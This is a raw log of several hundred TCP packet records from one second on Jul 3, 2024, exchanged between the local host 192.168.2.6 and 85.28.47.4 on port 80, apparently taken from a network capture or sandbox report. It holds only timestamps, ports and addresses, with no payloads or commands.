Jul 3, 2024 18:08:40.137387037 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.137392998 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.137392998 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.137398958 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.137409925 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.137420893 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.137432098 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.137434006 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.137434006 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.137443066 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.137465000 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.137473106 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.137473106 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.137480021 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.137506962 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.137506962 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.137583017 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.137859106 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.137871027 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.137881994 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.137893915 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.137904882 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.137908936 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.137908936 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.137918949 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.137940884 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.137953043 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.137957096 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.137957096 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.137964010 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.137974977 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.137991905 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.137991905 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.138108969 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.138174057 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.138190985 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.138201952 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.138212919 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.138225079 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.138259888 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.138259888 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.138324022 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.138335943 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.138346910 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.138370037 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.138381004 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.138386011 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.138386011 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.138391972 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.138402939 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.138413906 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.138423920 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.138430119 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.138430119 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.138436079 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.138447046 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.138458967 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.138477087 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.138504028 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.138504028 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.138942003 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.138952971 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.138963938 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.138974905 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.138984919 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.138988018 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.138998985 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.139009953 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.139019012 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.139019012 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.139020920 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.139033079 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.139046907 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.139060020 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.139060020 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.139069080 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.139098883 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.139098883 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.223556995 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.223584890 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.223596096 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.223673105 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.223684072 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.223692894 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.223695993 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.223707914 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.223735094 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.223735094 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.223840952 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.223902941 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.223939896 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.223939896 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.223946095 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.223957062 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.223983049 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.224004984 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.224004984 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.224076986 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.224088907 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.224112034 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.224112034 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.224184990 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.224196911 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.224203110 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.224209070 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.224220037 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.224224091 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.224252939 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.224252939 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.224343061 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.224353075 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.224364042 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.224378109 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.224387884 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.224400997 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.224400997 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.224500895 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.224509954 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.224520922 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.224533081 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.224544048 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.224555016 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.224595070 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.224595070 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.224639893 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.224651098 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.224680901 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.224693060 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.224697113 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.224697113 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.224704981 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.224730015 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.224730015 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.224900007 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.224910975 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.224921942 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.224934101 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.224945068 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.224945068 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.225116968 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.225127935 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.225137949 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.225151062 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.225157976 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.225157976 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.225162983 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.225173950 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.225184917 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.225195885 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.225202084 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.225202084 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.225207090 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.225218058 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.225229979 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.225400925 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.225411892 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.225419044 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.225446939 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.225569010 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.225580931 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.225590944 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.225601912 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.225609064 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.225621939 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.225631952 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.225642920 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.225653887 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.225653887 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.225653887 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.225666046 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.225677967 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.225689888 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.225693941 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.225693941 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.225699902 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.225709915 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.225742102 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.226018906 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.226023912 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.226037979 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.226058006 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.226082087 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.226203918 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.226214886 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.226226091 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.226238012 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.226248026 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.226248980 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.226260900 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.226268053 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.226272106 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.226284027 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.226295948 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.226308107 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.226313114 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.226313114 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.226361990 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.226361990 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.226526022 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.226536989 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.226547003 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.226557970 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.226566076 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.226568937 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.226589918 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.226636887 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.226649046 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.226660013 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.226660967 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.226670980 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.226681948 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.226694107 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.226696014 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.226705074 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.226716995 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.226733923 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.226733923 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.226907969 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.227195024 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.227215052 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.227226019 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.227231979 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.227236986 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.227247953 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.227256060 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.227262020 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.227262020 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.227272034 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.227283955 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.227294922 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.227302074 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.227302074 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.227305889 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.227318048 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.227329969 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.227334976 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.227334976 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.227340937 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.227351904 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.227361917 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.227374077 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.227384090 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.227385998 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.227385998 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.227395058 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.227427959 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.227427959 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.227838039 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.227849960 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.227861881 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.227873087 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.227880955 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.227880955 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.227889061 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.227900028 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.227910995 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.227925062 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.227925062 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.228507996 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.312208891 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.312235117 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.312246084 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.312334061 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.312345028 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.312356949 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.312411070 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.312478065 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.312478065 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.312478065 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.312478065 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.312521935 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.312547922 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.312557936 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.312618971 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.312618971 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.312658072 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.312674999 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.312685013 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.312695026 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.312736988 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.312736988 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.312791109 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.312843084 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.312882900 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.312894106 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.312906027 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.312917948 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.312922955 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.312949896 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.312949896 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.313014030 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.313024998 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.313035011 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.313045979 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.313055038 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.313055038 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.313057899 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.313067913 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.313105106 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.313105106 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.313283920 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.313301086 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.313312054 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.313323021 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.313334942 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.313347101 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.313364029 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.313364029 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.313436031 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.313452005 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.313477039 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.313477039 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.313530922 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.313541889 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.313554049 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.313565016 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.313572884 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.313572884 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.313719034 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.313752890 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.313752890 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.313774109 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.313790083 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.313827991 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.313827991 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.313843966 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.313855886 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.313867092 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.313879013 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.313889980 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.314018011 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.314029932 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.314040899 CEST	80	49710	85.28.47.4	192.168.2.6
